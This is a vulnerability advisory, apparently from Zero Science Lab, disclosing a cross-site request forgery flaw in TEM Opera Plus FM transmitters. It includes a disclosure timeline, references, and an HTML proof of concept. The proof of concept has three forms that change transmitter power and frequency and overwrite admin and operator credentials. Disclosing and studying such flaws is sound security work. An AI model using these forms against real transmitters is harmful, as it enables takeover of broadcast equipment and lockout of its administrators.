Lucene search

K
zeroscienceGjoko KrsticZSL-2023-5800
HistoryOct 25, 2023 - 12:00 a.m.

TEM Opera Plus FM Family Transmitter 35.45 XSRF

2023-10-2500:00:00
Gjoko Krstic
zeroscience.mk
152
tem opera plus
fm transmitter
cross-site scripting
vulnerability
http requests
administrative privileges
telecomunicazioni elettro milano
software version 35.45
webserver version 1.7
cert serbia
gjoko krstic
zero science lab.

AI Score

6.7

Confidence

High

Title: TEM Opera Plus FM Family Transmitter 35.45 XSRF
Advisory ID: ZSL-2023-5800
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 25.10.2023

Summary

This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources, built-in stereo encoder, integrated RDS encoder, parallel I/O card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP Webserver.

Description

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Vendor

Telecomunicazioni Elettro Milano (TEM) S.r.l. - <https://www.tem-italy.it>

Affected Version

Software version: 35.45
Webserver version: 1.7

Tested On

Webserver

Vendor Status

[18.08.2023] Vulnerabilikty discovered.
[22.08.2023] Vendor contacted.
[05.10.2023] No response from the vendor.
[06.10.2023] Vendor contacted.
[08.10.2023] No response from the vendor.
[09.10.2023] CERT Serbia contacted.
[09.10.2023] CERT Serbia responded asking more details. Created incident ID: 355655.
[09.10.2023] Replied to CERT Serbia.
[24.10.2023] Asked CERT Serbia for status update.
[25.10.2023] No response from CERT Serbia.
[25.10.2023] Public security advisory released.

PoC

tem_csrf.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://cxsecurity.com/issue/WLB-2023100060&gt;
[2] <https://packetstormsecurity.com/files/175373/TEM-Opera-Plus-FM-Family-Transmitter-35.45-Cross-Site-Request-Forgery.html&gt;
[3] <https://www.exploit-db.com/exploits/51828&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/275731&gt;

Changelog

[25.10.2023] - Initial release
[03.11.2023] - Added reference [1] and [2]
[28.02.2024] - Added reference [3]
[06.03.2024] - Added reference [4]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--

TEM Opera Plus FM Family Transmitter 35.45 XSRF


Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
                  Webserver version: 1.7

Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: Webserver


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5800
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php


18.08.2023

--><html><body><p>CSRF Change Forward Power:
-------------------------


  </p>
<form action="http://192.168.1.2:8000/user/postcmd.htm" enctype="text/plain" method="POST">
<input name="Pwr" type="hidden" value="00100"/>
<input type="submit" value="Change"/>
</form>
  



CSRF Change Frequency:
---------------------


  
    <form action="http://192.168.1.2:8000/user/postcmd.htm" enctype="text/plain" method="POST">
<input name="Freq" type="hidden" value="95.5"/>
<input type="submit" value="Change"/>
</form>
  



CSRF Change User/Pass/Priv Change Admin/User/Pass:
-------------------------------------------------


  
    <form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
<input name="usr0" type="hidden" value="admin"/>
<input name="psw0" type="hidden" value="admin"/>
<input name="usr1" type="hidden" value="operator1"/>
<input name="psw1" type="hidden" value="operator1"/>
<input name="lev1" type="hidden" value="1"/>
<input name="usr2" type="hidden" value="operator2"/>
<input name="psw2" type="hidden" value="operator2"/>
<input name="lev2" type="hidden" value="1"/>
<input name="usr3" type="hidden" value="consulter1"/>
<input name="psw3" type="hidden" value="consulter1"/>
<input name="lev3" type="hidden" value="2"/>
<input name="usr4" type="hidden" value="consulter2"/>
<input name="psw4" type="hidden" value="consulter2"/>
<input name="lev4" type="hidden" value="2"/>
<input name="usr5" type="hidden" value="consulter3"/>
<input name="psw5" type="hidden" value="consulter3"/>
<input name="lev5" type="hidden" value="2"/>
<input type="submit" value="Change"/>
</form>
</body></html>

AI Score

6.7

Confidence

High